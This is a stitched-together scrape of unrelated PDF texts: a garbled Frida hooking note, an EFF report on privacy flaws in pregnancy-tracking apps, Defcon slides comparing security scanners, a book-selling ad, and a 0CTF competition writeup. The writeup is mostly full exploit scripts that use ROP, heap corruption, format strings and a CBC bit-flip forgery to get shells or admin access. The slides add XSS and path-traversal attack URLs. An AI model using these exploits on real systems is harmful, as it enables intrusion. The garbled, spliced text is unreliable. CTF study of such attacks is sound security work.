demofrida-traceclihook
vpn
ps -ef | grep ECAgent //pid
sudo /home/miku/miniconda3/envs/py3.8/bin/frida-trace -i "recv" -p 1328 //attach pidhookrecv
sorecvhookjshook
sudo vim /home/miku/__handlers__/libc_2.27.so/recv.js
hookonEnteronLeavehook
recvlibpthread_2.27.sorecv
hook
0x03
bodyECAgentwritereadsocket
hookbody
writeread
writereadfdbufbodybufhookbuf
onEnteronLeavehookhook
onEnter(log, args, state) //argsfdbuf
onLeave(log, retval, state) //args
hookwritewritebuffdonEnterbufonEnter
bufhook readreadonEnterbufreadbuf
onLeavebufonLeaveargs
JavaScript api
nativepointer
emmm
0x04
linuxvpnfrida
fridaidaserverfrida
Fridahookappfrida
frida serverhookapp
0x05
frida
frida | pdf |
The Pregnancy Panopticon
Cooper Quintin, Staff Technologist, EFF
July 2017
Defcon 25
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 1
Table of Contents
Abstract
3
Methods
3
MITM Proxy
4
Jadx and Android Studio
4
Kryptowire
4
Security Issues
5
Code execution and content injection
5
Account Hijacking
6
Unencrypted Requests
6
Privacy Issues
6
Third Party Trackers
6
Pin Locks
8
Unauthenticated Email
8
Information Leaks
9
Files Not Deleted
9
Permissions
10
Conclusion
10
Acknolwledgements
11
Appendix A - Permissions requested by each app
12
Appendix B. - Further Notes
13
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 2
Abstract
Women’s health is big business. There are a staggering
number of applications for Android and iOS which claim
to help people keep track of their monthly cycle, know
when they may be fertile, or track the status of their
pregnancy. These apps entice the user to input the most
intimate details of their lives, such as their mood, sexual
activity, physical activity, physical symptoms, height,
weight, and more. But how private are these apps, and
how secure are they in fact? After all, if an app has such
intimate details about our private lives, it would make
sense to ensure that it is not sharing those details with
anyone, such as another company or an abusive family
member. To this end, EFF and Gizmodo reporter
Kashmir Hill have taken a look at some of the privacy and
security properties of nearly twenty different fertility and
pregnancy tracking applications. While this is not a
comprehensive investigation of these applications by any
means, we did uncover several privacy issues, some
notable security flaws, and a few interesting security
features in the applications we examined. We conclude
that while these applications may be fun to use, and in some cases useful to the people who need
them, women should carefully consider the privacy and security tradeoffs before deciding to use
any of these applications.
This document is a technical supplement to “What Happens When You Tell the Internet You’re
Pregnant” published by Kashmir Hill on jezebel.com.
Methods
For this report we tested the following apps: Glow, Nurture, Eve, pTracker, Clue, What to
Expect, Pregnancy+, WebMD Baby, Pinkpad, Flo, MyCalendar (Book Icon), MyCalendar (Face
1
Icon), Fertility Friend, Get Baby, Babypod, Baby Bump, The Bump, Ovia, and Maya. Our
2
methods involved dynamic analysis using the network man in the middle tool MITMProxy and
3
ProxyDroid on a rooted Moto E Android phone running stock Android 4.4.4, static analysis
1 com.popularapp.periodcalendar
2 com.lbrc.PeriodCalendar
3 Man in the Middle Proxy - https://mitmproxy.org/
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 3
using the Jadx decompiler and Android Studio, and analysis using the Kryptowire Enterprise
Mobile Management tool.
MITM Proxy
MITM Proxy is a proxy server which is able to intercept
and decrypt HTTPS connections by installing a custom
root certificate on the target device which is then used for
all SSL connections. MITM Proxy is then able to decrypt
and record a flow of plaintext and HTTPS traffic for
inspection. MITM proxy can also be used to edit and
replay requests. For this research we used MITM
x`x`Proxy to inspect network traffic, review the APIs
(Application Programming Interfaces) used by these
applications, and determine which third parties are being
contacted and what information is being sent to them.
Jadx and Android Studio
JADX is a decompiler for Android packages which is
4
able to produce Java code that can be viewed and edited
in the Android Studio programming environment. This
technique was used to determine why and how certain
permissions were used and other key information about
the applications.
Kryptowire
Kryptowire is a proprietary Android application analysis platform which was generously
5
donated to EFF for this research. Kryptowire was used to quickly scan a large number of
applications for personal information leaks, common vulnerabilities, and excessive permissions.
Using Kryptowire, we were able to quickly discover issues in several applications, such as location
leaks and bad programming practices including world readable preferences. We were also able to
see where and how certain Android APIs were being used (for example, we found many
applications requesting the name of the user’s network operator) presumably for advertising
purposes.
We were also able to quickly triage several applications that were not in our original set to
determine whether they would require further manual analysis. Triaging these applications
4 https://github.com/skylot/jadx
5 http://www.kryptowire.com/
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 4
would have taken several days of manual analysis, but using Kryptowire, we were able to do this
work in a matter of minutes.
Security Issues
The “Glow” family of applications (Glow, Nurture, and Eve), as well as “Clue” all use certificate
pinning—a technique which prevents someone with a fraudulently issued SSL certificate from
intercepting traffic. This is a step not even taken by most banking apps, and it is certainly a good
way to protect against a certain class of attack. Unfortunately, this same property prevents us
from inspecting the HTTPS traffic of these apps with MITM Proxy, meaning we are unable to
do further dynamic analysis on these applications.
Certificate pinning is a desirable—if esoteric—security feature to include. On the other hand,
none of the apps examined support two-factor authentication, which may have been a more
practical step for securing users’ information against common attacks.
Code execution and content injection
Several
apps
(What
to
Expect,
WebMD
Baby,
Pregnancy+, and both apps named MyCalendar) make
unencrypted requests for HTML content which were
then displayed to the user. This raises the possibility of a
man in the middle code execution attack against these
applications. None of the applications appears to do any
sanitizing of the input that they receive from the
unencrypted HTML request.
Both MyCalendar applications fetch advertisements
meant for display over an unencrypted connection,
raising the further possibility of a man in the middle
content injection. What’s more, MyCalendar (Face
Icon) makes an unauthenticated HTTPS request to the
ajax.googleapis.com CDN to get a copy of the jQuery library. An attacker who can create a self
signed certificate for ajax.googleapis.com could inject their own copy of the jQuery library in it’s
place. This could potentially allow for the possibility of code execution within the application,
and even account takeover, if Jquery is used to handle authentication at all, though the researcher
has not confirmed this.
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 5
Account Hijacking
Pinkpad, WebMD Baby, The Bump, and MyCalendar (Book Icon) send unencrypted user
authentication cookies over the network. This means that a man in the middle attacker could
easily take over a user’s account. This is an extremely severe security flaw. No application should
be making any unencrypted requests when free SSL certificates are available, and certainly not
requests containing user authentication tokens.
Unencrypted Requests
What to expect, Eve, Pregnancy+, pTracker, WebMD Baby, Pinkpad, and both MyCalendar
apps make plaintext HTTP requests to app servers and third party servers. Of those, pTracker,
and MyCalendar (Book Icon) only make third party requests unencrypted while MyCalendar
(Face Icon), Eve, and Pregnancy+ only make unencrypted requests to first party servers. This
issue has been fixed in Eve as of this report.
As we stated above, unencrypted requests should be considered harmful due to the high
probability of data leakage, code execution, and account hijacking. The industry best practice
would be to not ever send any unencrypted data to another server and we recommend that all
applications do this immediately.
Privacy Issues
Third Party Trackers
When an application makes an internet connection to a domain other than one owned by the
company that made it, this is called a Third Party connection. Third party connections are often
used for analytics, content delivery and advertising. Some common third parties that applications
connect to include Doubleclick, Google, Facebook, Crashlytics, and Amazon. All third party
connections have the ability to uniquely identify your phone and track which applications you
are using on it (and sometimes more detailed information as well). Third party connections may
purposefully or accidentally reveal sensitive information about the user. When found in
conjunction with applications that record intimate details about our health and sex life, this can
be especially troubling.
Almost all of the applications we tested make requests to third party servers, the notable
exception being Fertility Friend. The application with the largest number of third party
connections is The Bump, which connects to over 18 different third party domains. The most
popular third party services are Google and Facebook, which both appear in 15 different
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 6
applications, followed by Doubleclick (owned by Google) which appears in 13 different
applications, and Crashlytics (owned by Google) in 11 different applications.
Glow and Eve were both observed sending the phone’s IMEI (a permanent serial number for the
device) to the Appsflyer third party server. The IMEI can be used to uniquely identify a device
across multiple apps even if the phone is factory reset or a new operating system is installed. Due
to the massive privacy problems this presents, many developers have switched to using the
“mobile advertising id,” which Google and Apple both support and which can be changed by the
user. We reported this issue to Glow (which also makes Eve) and were informed that it has been
fixed in the latest version.
We observed that “Flo” sends the following data in a request to the Facebook Graph API:
custom_events_file: [{
"_ui":"unknown","_session_id":"7480e02d-1eb6-4216-bfaf-xxxx
xxxx",
"_eventName":"SESSION_FINISHED_FIRST_LAUNCH","graph":"true"
,
"event_added":"true","_logTime":1484779886,
"Menstruation_changes":"true"
}]
Apparently this API is used for analytics and conversion tracking by the developer. According to
Facebook:
Facebook does not share any app event data sent on your behalf to advertisers or other
third parties, unless we have your permission or are required to do so by law.
It is unclear how much privacy protection this statement actually offers. Facebook also stores this
data along with the user’s advertising ID, mentioned above, meaning this data could potentially
be linked to data from other apps as well.
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 7
Pin Locks
pTracker, Clue, MyCalendar (Book), MyCalendar (Face),
Fertility Friend, Pinkpad, Flo, Maya, and WebMD Baby all
support a PIN code for access. While this is better than
nothing for protecting data from a local attacker (e.g. an
abusive partner or guardian), it falls far short of offering
effective security.
The pin code does not appear to offer any encryption, thus
any attacker who can gain root access to the phone would
be able to extract data from the applications. Additionally,
none of the pin codes have any limit on the number of tries
or any sort of delay, and most of them limit the pin to 4
digits, making them fairly easy targets on which to perform
a brute force attack. Maya will email a reset code to your
email account, which is presumably also accessible from the
user’s phone, making the pin lock useless. MyCalendar
(Book Icon) stores backup data in plaintext on the SD card,
rendering the pin code entirely useless. Therefore, we
conclude that these pin codes are unreliable for the purpose
of ensuring data security.
Unauthenticated Email
What To Expect has several API endpoints which could allow a malicious actor to send a large
number of emails to an email address of their choice. While the attacker does not get to choose
the contents of the mail, they could still flood a person’s inbox with a large number of unwanted
emails, causing a nuisance.
The What to Expect API also allows one to sign up for a large number of mailing lists without
confirming the receiving address. Using this, one could sign their friends up for several dozen
mailing lists without any confirmation.
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 8
Information Leaks
We found several information leaks during the course of our research, some of which were quite
disturbing. The MyCalendar app, for example, writes a log of everything that you enter into it
into a text file which is stored on the SD card, as seen in Figure 4. The fact that this is written to
the SD card means that any other application or person with access to the user’s phone could
trivially read it and learn detailed personal information.
The Alt12 family of applications (Pinkpad and Baby Bump) were both found to send the user’s
6
precise GPS coordinates to the alt12 application server every time the application was opened.
The applications give no indication to the user that this is happening. We can only guess as to
why the application does this, perhaps for the purposes of geo-targeted advertising. Glow,
Pregnancy+, What to Expect, and WebMD Baby were all found to access the user’s location.
Regardless of why the location is accessed and recorded, it is an extremely subtle and disturbing
invasion of privacy.
Files Not Deleted
One application we tested, The Bump, had a feature which allowed users to upload a picture of
themselves while pregnant (called a “belly photo”) or a photo of their children. We discovered
that deleting these pictures in the application did not cause the pictures to be removed from the
6 https://www.alt12.com/
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 9
server, leaving them available to be accessed publicly. This is, of course, unexpected behavior and
could be a severe issue if someone using this application uploaded a photo including personal or
private information that they later wished to remove.
Permissions
We also performed a cursory examination of the permissions required by each application. Get
Baby is unique in that it requires zero permissions for use. pTracker requires only one
permission, and most of the applications require only 2 or 3 permissions. On the opposite end of
the spectrum, Pregnancy+ requires 9 different permissions. It’s also important to note that the
number of permissions does not directly correlate with the degree of privacy an application
offers.
Most of the apps request the SD card permission, which is used to store data, cache, and photos
from the app and is generally harmless. Several of the applications, however, request location
permission to determine fine-grained location information. The researcher is unable to determine
how this might be used other than to enable geo-targeted ads. The dangers of geo-targeted ads are
outside the scope of this paper, but there have been some stunning demonstrations of how they
can be used maliciously.
The Device ID permission is used by Glow, Eve, What to Expect, and Pinkpad to get the IMEI
7
of the device. This is most likely used for advertising. Since the IMEI is unchangeable under
normal operation, it is a very intrusive method of tracking, allowing advertisers to continue
tracking a user even if they factory reset their devices. For this reason, Google has discouraged the
use of IMEI for advertising. Eve has fixed the issue as of this report.
Conclusion
The number of security and privacy issues that we discovered in just this cursory look at the few
most popular applications could lead one to a pretty grim view of women’s health applications.
Certainly several of the applications had severe privacy and security issues and could not be
recommended.
Our research here is not exhaustive, and there are still many avenues of research in these
applications left unexplored. For example, Elvie sends the user’s password to the server as an
unsalted SHA1 hash. If passwords are stored this way, they would be easy to crack if someone
were to get ahold of the hashes. Even worse, Maya appears to store the user’s password as
plaintext, which is emailed to the user when they request a password reset.
On the other hand, some of the applications did surprisingly well on our tests. Fertility Friend,
for example, makes no third party server contacts (except for YouTube for viewing tutorials) and
7 International Mobile Equipment ID - A hardware serial number uniquely identifying a phone.
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 10
has no obvious security flaws that we have found. Clue seems to be relatively secure and has a
well-implemented feature for sharing the user’s cycle with others. On the other hand, many of
these applications appear to have been written extremely quickly, consisting of no more than a
calendar, some code to calculate averages, and an advertising library. These applications aren’t
usually complex enough to have any serious security vulnerabilities, but they shouldn’t be relied
on for medical advice, and one should consider how much personal information could be sent to
third parties through their use.
Acknolwledgements
Huge thanks to Kryptowire for donating their analysis tools. Thanks to EFF and Gizmodo media
for funding this research. Thanks to Kashmir Hill and Elev for the inspiration and co-research.
Thanks to A for inspiration and support.
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 11
Appendix A - Permissions requested by
each app
App
SD Card Purchases Identity Location Phone
Device
ID
Contacts sms Camera Wifi
Period Tracker
✓
Glow
✓
✓
✓
✓
✓
✓
Nurture
✓
✓
✓
Clue
✓
✓
✓
Eve
✓
✓
✓
✓
✓
What to expect
✓
✓
✓
✓
✓
Pregnancy+
✓
✓
✓
✓
✓
✓
✓
✓
✓
Webmd Baby
✓
✓
✓
✓
✓
Pinkpad
✓
✓
✓
✓
✓
✓
Flo
✓
✓
MyCalendar (Book)
✓
✓
✓
MyCalendar (Face)
✓
✓
Fertility Friend
✓
✓
Get baby
Babypod
✓
✓
✓
BabyBump
✓
✓
✓
✓
✓
✓
✓
Ovia Pregnancy
✓
✓
✓
✓
✓
Ovia Fertility
✓
✓
✓
The Bump
✓
✓
✓
✓
✓
Maya
✓
✓
✓
✓
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 12
Appendix B. - Further Notes
App
Unencrypted
Requests
Third Party Requests
Notes
Period Tracker third party
Apsalar, Doubleclick, Google,
Google-Analytics
Supports pin lock
Glow
none
Crashlytics, Appsflyer, Google,
Ravenjs, Cloudfront, Facebook
Appears to use
certificate pinning
Nurture
none
Crashlytics, Appsflyer, Google,
Ravenjs, Cloudfront, Facebook
Made by Glow, appears
to use cert pinning
Clue
none
Amplitude, Branch.io, Lean plum,
Crashlytics, Facebook, Flurry
Good privacy policy,
lower number of third
parties, supports pin
lock
Eve
first party
Facebook, Crashlytics, Lyr8, Appsflyer,
Branch.io
Made by the same
company that makes
Glow, some certificate
pinning in use possibly,
responded and fixed
security issues
What to expect first and third
party
Brightcove, 2o7, Doubleclick,
Facebook, Google-Analytics, Scorecard
research, Google
Opts users into two
different mailing lists,
can't use + in email when
registering
Pregnancy+
first party
Google-Analytics, Crashlytics,
Doubleclick, Facebook, Google, Flurry
Webmd Baby
first and third
party
Facebook, Demdex, Crashlytics,
Appboy, Scorecardresearch,
Doubleclick
Supports pin lock,
doesn’t allow + in email
address
Pinkpad
first and third
party
Flurry, Facebook, Google-Analytics,
Google, Amazon, Newrelic, Cloudfront
Supports pin lock, shares
GPS coordinates with
server on startup
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 13
App
Unencrypted
Requests
Third Party Requests
Notes
Flo
none
Facebook, Flurry, Crashlytics, Google
Supports pin lock
MyCalendar
(Book)
first party
Crashlytics, Doubleclick, Google,
Google-Analytics, Facebook
Supports pin lock
MyCalendar
(Face)
third party
Crashlytics, Google, Doubleclick,
MoPub, Facebook, AdMarvel, Rubicon
project, TapSense, Amazon, BlueKai,
others
Supports pin lock
Fertility Friend None
None
Loads tutorials from
youtube but opt-in
Get Baby
none
Google, Doubleclick
Babypod
n/a
n/a
No network connection
BabyBump
None
Facebook, Google, Flurry, Localytics,
Crashlytics
Shares GPS coordinates
with server on startup
Ovia
Pregnancy
Third party
Facebook, Google, Scorecard, Flurry,
Crashlytics, Optimizely, Moatads,
AllFont.net
Ovia Fertility
None
Facebook, Google, Scorecard, Flurry,
Crashlytics, Optimizely
The Bump
First and third
party
Scorecard, GPSoneXtra, Facebook,
Amazon, Advertising.com, Demdex,
Nexac, Rlcdn, Addthis, eAccelerator,
Bluekai, Doubleclick, Segment,
Moatads, Google, Mixpanel, Rubicon,
MathTag, and more.
Fails to remove deleted
files from server, Leaks
authentication tokens
over HTTP
Maya
None
Facebook, Google, Crashlytic,
Clevertap
Supports pin Lock,
passwords stored in
plaintext
ELECTRONIC FRONTIER FOUNDATION
EFF.ORG 14 | pdf |
Comparing Application Security Tools
Defcon 15 - 8/3/2007
Eddie Lee
Fortify Software
Agenda
Intro to experiment
Methodology to reproduce experiment on your own
Results from my experiment
Conclusions
Introduction
Tools Used
“Market Leading” Dynamic Testing Tools
A Static Code Analyzer
Dynamic Test Tracing Tool
The Application
Open source Java based Blog
http://pebble.sourceforge.net
Reasons for choosing this application
The Experiment
Out of the box scans
Compared findings from each tool
How The Tools Work
Dynamic Testing Tools
Fuzz web form input
Signature and Behavioral Matching
Modes of Scanning
Auto-crawl
Manual crawl
Static Code Analyzer
Data flow
Control flow
Semantic
Dynamic Test Tracing Tool
Bytecode instrumentation
Monitor data coming in and out of the application
Run in conjunction with other dynamic testing tools
Methodology
How to reproduce experiments on your own (Dynamic Testing Tools)
Download source code
Build & Deploy Application
Figure out how to cleanly undeploy the application
Clear database or stored files
Run scanner in mode auto-crawl mode
Make sure the application doesn’t break during your scans
If the app breaks, figure out why the scanner breaks the app.
Configure scanner to ignore the parameter(s) causing app to break
Note the parameter(s) won’t be tested for vulnerabilities and the existence of a
DoS vulnerability
Undeploy and Redeploy the application
Repeat
Save the results from your last clean run
Repeat for scanner in mode manual-crawl mode
Verify the results
Verify results through manually testing
Record false positive rate
Normalize results
Record source file and line number information where vulnerabilities occur
How to reproduce experiments on your own (Static Testing Tool)
Not much to it
Point the scanner at code and tell it where it can find needed libraries
Scan the same code you use in other tests
Verify results are true positives and weed out false positives
Verify results through manually testing on running application
Record false positive rate
Normalize the results
How to reproduce experiments on your own (Dynamic Tracing Tool)
Instrument the compiled code
Deploy instrumented code
Start recording
Perform dynamic testing
Stop recording
Verify results are true positives and weed out false positives
Verify results through manually testing on running application
Record false positive rate
Normalize the results
Setup and Result Quantification
Tool Configuration and Setup
Dynamic Testing Tools
Modes of operation: Auto Crawl & Manual Crawl
Minor tweaking for the application
Quantification of Results
Tools report vulnerabilities in different units
Standardized on location in source code where vulnerability occurs
Normalized reported numbers
Use the normalized vulnerability counts for comparison among tools
Results
Results: Overview
X-Unique to
Tool
X-Multiple
Tools
Results: Overview
XSS
title
saveBlogEntry.secureaction
16
blogEntry.jsp
Category
Parameter
URL
Line #
File
X
X
Tool #5a
Tool #4a
Tool #3a
Tool #2b
Tool #2a
Tool #1b
Tool #1a
Results: Overview
X-Unique to
Tool
X-Multiple
Tools
Results: Exploit Examples
Cross-Site Scripting
Error.jsp:18
Code:
Request URI : ${pageContext.request.requestURI}
Attack:
http://host/pebble/</textarea><script>alert(123)</script>/createDirectory.secureaction?type=blogFile
viewResponses.jsp:31
Code:
<input type="hidden" name="type" value="${param.type}" />
Attack:
http://host/pebble/viewResponses.secureaction?type="><script>alert(1)</script>
Results: Exploit Examples
Path Manipulation
DefaultSecurityRealm.java:213
Code:
return new File(getFileForRealm(), username + ".properties");
Attack:
http://host/pebble/saveUser.secureaction?username=../../../../../../../../etc/passwd%00&n
ewUser=true&name=joe&[email protected]&website=blah.com
Arbitrary URL Redirection
RedirectView.java:85
Code:
response.sendRedirect(getUri());
Attack:
http://host/pebble/logout.action?redirectUrl=http://www.attacker.com
Results: Manual Audit
Vulnerabilities not detected by any tool (from just one file)
Cross-Site Scripting Detection By Tool
Tool 1b
Tool 1b and Tool 2b
Tool 2b
Not
detected by
any tool
Tool 5a
Detected by
all tools
*1a, 2a, 3a and 4a not shown because findings were not significant
Conclusions
A single tool doesn’t cut it
Using multiple tools significantly increases vulnerabilities found
Little overlap between tools
Tools alone aren’t enough
Run these tests on your own apps to see how they perform in
your environment
Fuzzing tools break shit
Takes a long time to scan and troubleshoot the application
Don’t expect these tests to be quick
Q&A
Thanks! | pdf |
提供各种IT类书籍pdf下载,如有需要,请 QQ: 2011705918
注:链接至淘宝,不喜者勿入! 整理那么多资料也不容易,请多多见谅!非诚勿扰!
[ G e n e r a l I n f o r ma t i o n ]
书名= 日志管理与分析权威指南
作者= (美)褚瓦金,(美)施密特,(美)菲利普斯著
丛书名= 华章程序员书库
页数= 3 1 6
S S 号= 1 3 5 8 9 0 4 2
出版日期= 2 0 1 4 . 0 6
出版社= 北京:机械工业出版社
I S B N 号= 9 7 8 - 7 - 1 1 1 - 4 6 9 1 8 - 6
中图法分类号= T P 3 9 3 . 0 7
原书定价= 6 9 . 0 0
参考文献格式= (美)褚瓦金,(美)施密特,(美)菲利普斯著. 日志管理与分
析权威指南. 北京:机械工业出版社, 2 0 1 4 . 0 6 .
内容提要= 本书从日志的基本概念开始,循序渐进讲解整个日志生命期的详细过程
,涵盖日志数据收集、存储分析和法规依从性等主题,并通过丰富的实例,系统阐
释日志管理与日志数据分析的实用技术和工具。 | pdf |
0CTF-Writeup
Aut hor-Nu1L
PWN:
char
明显的栈溢出,但输入限制了只能是可打印字符,各种找rop gadget,通过int 0x80执
行execve
EXP:
from pwn import *
VERBOSE = 1
LOCAL = 1
DEBUG = 0
if VERBOSE:
context.log_level = 'debug'
if LOCAL:
io = process('./char')
if DEBUG:
gdb.attach(io)
else:
io = remote('202.120.7.214', 23222)
#raw_input('go?')
io.recvuntil('GO : ) \n')
xor_eax = 0x55656b52
inc_eax = 0x555f5b7a
int_80 = 0x55667177
xchg_ebx_edi = 0x55623b42
inc_edx = 0x555e7a4b
mov_eax_edx = 0x555b3454
pop_esi = 0x55686c72
xchg_eax_edi = 0x556f6061
pop_ecx = 0x556d2a51
null = 0x55664128
pop_edx = 0x555f3555
payload = p32(xor_eax) * 8
payload += p32(inc_edx) * 4 + p32(mov_eax_edx) + p32(pop_esi) + p32(xor_eax) + p32(x
chg_eax_edi) + p32(xchg_ebx_edi) + p32(xor_eax) + p32(pop_ecx) + p32(null) + p32(pop
_edx) + p32(null) + p32(null) + (p32(inc_eax) + p32(xor_eax) * 3) * 11 + p32(int_80)
payload += '/bin/sh'
io.sendline(payload)
io.interactive()
0CTF-Writeup
1/22
diethard
程序自己实现了一个堆的分配机制,bins以8的幂来分类,通过bitmap来标志bin是否有
使用,off-by-one修改bitmap产生overlapping chunk,覆盖buffer指针泄漏libc地址,
再改got表执行system(“/bin/sh”)
0CTF-Writeup
2/22
EXP:
from pwn import *
VERBOSE = 1
DEBUG = 0
LOCAL = 1
if VERBOSE:
context.log_level = 'debug'
if LOCAL:
io = process('./diethard')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
io = remote('202.120.7.194', 6666)
libc = ELF('./libc.so')
def add_msg(len, content):
io.recvuntil(' 3. Exit\n\n')
io.sendline('1')
io.recvuntil('Input Message Length:\n')
io.sendline(str(len))
io.recvuntil('Please Input Message:\n')
io.sendline(content)
def del_msg(id):
io.recvuntil(' 3. Exit\n\n')
io.sendline('2')
io.recvuntil('1. ')
addr = io.recvn(8)
io.recv()
# io.recvuntil('Which Message You Want To Delete?')
io.sendline(str(id))
return addr
elf = ELF('./diethard')
payload1 = 'content'
add_msg(len(payload1), payload1)
payload2 = 'A' * 2015
add_msg(len(payload2), payload2)
add_msg(len(payload2), payload2)
payload3 = 'A' * 8 + p64(0x20) + p64(elf.got['puts']) + p64(0x400976)
payload3 = payload3.ljust(2017, 'A')
add_msg(len(payload3), payload3)
puts_addr = del_msg(2)
puts_addr = u64(puts_addr)
system_addr = libc.symbols['system'] - libc.symbols['puts'] + puts_addr
bin_sh_addr = next(libc.search('/bin/sh')) - libc.symbols['puts'] + puts_addr
log.info('puts_addr:%#x' % puts_addr)
log.info('system_addr:%#x' % system_addr)
log.info('bin_sh_addr:%#x' % bin_sh_addr)
del_msg(0)
add_msg(len(payload2), payload2)
payload4 = 'A' * 8 + p64(0) + p64(bin_sh_addr) + p64(system_addr)
payload4 = payload4.ljust(2017, 'A')
add_msg(len(payload4), payload4)
io.recvuntil(' 3. Exit\n\n')
io.sendline('2')
io.recvuntil('1. ')
io.interactive()
0CTF-Writeup
3/22
Baby Heap 2017
跟house of orange很像,但多了free,少了malloc以calloc代替,因此先overlapping
chunk,然后free堆块成fastbin和unsorted bin,来泄漏heap和libc的地址,之后就跟
house of range一样了,unsorted bin attack伪造io_list_all,再calloc失败来执行
system(“/bin/sh”)
EXP:
from pwn import *
VERBOSE = 1
DEBUG = 0
LOCAL = 1
if VERBOSE:
context.log_level = 'debug'
if LOCAL:
io = process('./babyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if DEBUG:
context.aslr = False
gdb.attach(io)
else:
io = remote('202.120.7.218', 2017)
libc = ELF('./libc.so.6')
def allocate(size):
io.recvuntil('Command: ')
io.sendline('1')
io.recvuntil('Size: ')
io.sendline(str(size))
def fill(index, size, content):
io.recvuntil('Command: ')
io.sendline('2')
io.recvuntil('Index: ')
io.sendline(str(index))
io.recvuntil('Size: ')
io.sendline(str(size))
io.recvuntil('Content: ')
io.send(content)
def delete(index):
io.recvuntil('Command: ')
io.sendline('3')
io.recvuntil('Index: ')
io.sendline(str(index))
def dump(index):
io.recvuntil('Command: ')
io.sendline('4')
io.recvuntil('Index: ')
io.sendline(str(index))
data = io.recvuntil('1. Allocate')
return data
#raw_input('go?')
0CTF-Writeup
4/22
allocate(0x100 - 8)
allocate(0x100 - 8)
allocate(0x80 - 8)
allocate(0x80 - 8)
allocate(0x100 - 8)
allocate(0x100 - 8)
allocate(0x100 - 8)
allocate(0x100 - 8)
delete(1)
payload1 = 'A' * 0xf0 + p64(0) + p64(0x181)
fill(0, len(payload1), payload1)
allocate(0x180 - 8)
payload2 = 'A' * 0xf0 + p64(0) + p64(0x81)
fill(1, len(payload2), payload2)
delete(3)
delete(2)
heap_addr = u64(dump(1)[0x10a:0x10a+8])
delete(5)
payload3 = 'A' * 0xf0 + p64(0) + p64(0x201)
fill(4, len(payload3), payload3)
allocate(0x200 - 8)
payload4 = 'A' * 0xf0 + p64(0) + p64(0x101)
fill(2, len(payload4), payload4)
delete(6)
libc_addr = u64(dump(2)[0x10a:0x10a+8])
if LOCAL:
libc_addr = libc_addr - (0x2aaaab08e7b8 - 0x2aaaaacd0000)
else:
libc_addr = libc_addr - (0x7f3007003678 - 0x7f3006c5e000)
system = libc_addr + libc.symbols['system']
io_list_all = libc_addr + libc.symbols['_IO_list_all']
vtable_addr = heap_addr + (0x555555757c08 - 0x555555757280)
log.info('libc_addr:%#x' % libc_addr)
log.info('heap_addr:%#x' % heap_addr)
log.info('system:%#x' % system)
log.info('io_list_all:%#x' % io_list_all)
log.info('vtable_addr:%#x' % vtable_addr)
payload1 = 'A' * 0xf0 + p64(0) + p64(0x901)
fill(7, len(payload1), payload1)
allocate(0x1000)
allocate(0x400)
payload = "A" * 0x400
stream = "/bin/sh\x00" + p64(0x61) # fake file stream
stream += p64(0xddaa) + p64(io_list_all-0x10) # Unsortbin attack
stream = stream.ljust(0xa0,"\x00")
stream += p64(vtable_addr-0x28)
stream = stream.ljust(0xc0,"\x00")
stream += p64(1)
payload += stream
payload += p64(0)
payload += p64(0)
payload += p64(vtable_addr)
payload += p64(1)
payload += p64(2)
payload += p64(3)
payload += p64(0)*3 # vtable
payload += p64(system)
0CTF-Writeup
5/22
.EasiestPrintf
可以泄漏一个地址的数据,之后就是fsb,泄漏stdout,然后跟上题类似攻击file结构体
覆盖vtable
payload += p64(system)
fill(5, len(payload), payload)
allocate(0x4d0 - 8)
io.recv()
io.interactive()
EXP:
from pwn import *
VERBOSE = 1
DEBUG = 0
LOCAL = 1
if VERBOSE:
context.log_level = 'debug'
if LOCAL:
io = process('./EasiestPrintf')
libc = ELF('/lib32/libc.so.6')
if DEBUG:
gdb.attach(io)
else:
io = remote('202.120.7.210', 12321)
libc = ELF('./libc.so.6')
#raw_input('go?')
io.recvuntil('Which address you wanna read:\n')
io.sendline('134520900')
stdout_addr = int(io.recvuntil('\n')[:-1], 16)
vtable_addr = stdout_addr + 0x94
system_addr = stdout_addr - (libc.symbols['_IO_2_1_stdout_'] - libc.symbols['system'
])
log.info('stdout_addr:%#x' % stdout_addr)
log.info('system_addr:%#x' % system_addr)
content = {
vtable_addr: vtable_addr,
vtable_addr + 28: system_addr,
stdout_addr: u32('sh\x00\x00')
}
payload = fmtstr_payload(7, content)
io.recvuntil('Good Bye\n')
io.sendline(payload)
io.interactive()
0CTF-Writeup
6/22
Integrity
唯一会的一道密码学....
首先审计源码。得知要以 admin 用户登录就能得到flag,但是却不能注册 admin 用户。
使用的是AES CBC进行加解密。16byte进行分块,需要解密数据的格式是 iv + 密文 ,
而密文解密出来是16byte的签名+明文
iv可控,所以通过CBC比特反转攻击签名可控,所以只要构造明文为 admin + pad 就行
了
注册用户 'admin' + "\x0b" + "xxxxx"
得到的数据的格式是
删掉最后16byte, 在通过控制iv来控制checksum, 然后得到的密文进行登录,得到的就
是 admin 用户
payload:
16byte iv
16byte checksum
16byte admin+'\x0b'
16byte xxxxx + '\x0b'
Integrity
7/22
Misc
py
题目给了一个坏掉的pyc文件,没法用现有的库还原出源码
使用 marshal 模块查看pyc的结构信息
使用 dis 模块反编译下加解密和主模块的 co_code ,发现出现了一些无法解析的值
import hashlib
from pwn import *
BS = 16
def str_xor(x, y):
return "".join([chr(ord(x[i])^ord(y[i])) for i in xrange(16)])
def main():
payload = "admin"+"\x0b"*0xb+"xxxxx"
p = remote("202.120.7.217", 8221)
p.recvuntil("ogin")
p.sendline("r")
p.sendline(payload)
p.recvuntil("secret:\n")
ct = p.recvuntil("\n").strip().decode('hex')
IV = ct[:BS]
plain = "admin"+"\x0b"*0xb+"xxxxx"+"\x0b"*0xb
pmd5 = hashlib.md5(plain).digest()
admin = "admin"+"\x0b"*0xb
checksum = hashlib.md5(admin).digest()
cipher = str_xor(str_xor(IV, pmd5), checksum)
p.sendline("l")
